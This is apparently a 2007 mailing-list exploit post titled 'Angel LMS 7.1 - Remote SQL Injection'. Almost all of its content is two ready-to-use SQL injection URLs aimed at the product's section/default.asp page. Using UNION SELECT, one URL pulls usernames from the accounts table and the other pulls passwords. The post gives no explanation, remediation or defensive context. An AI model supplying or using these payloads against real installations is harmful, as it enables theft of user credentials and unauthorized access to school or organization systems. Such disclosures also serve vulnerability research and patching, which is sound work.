Angel LMS 7.1 - Remote SQL Injection
Date: 1 Mar 2007 16:06:06 -0000
From: [email protected]
To: [email protected]
Subject: Angel LMS 7.1 - Remote SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
# Angel LMS 7.1 Remote SQL Injection
# by Guns
#All User Accounts#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#Account Passwords#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"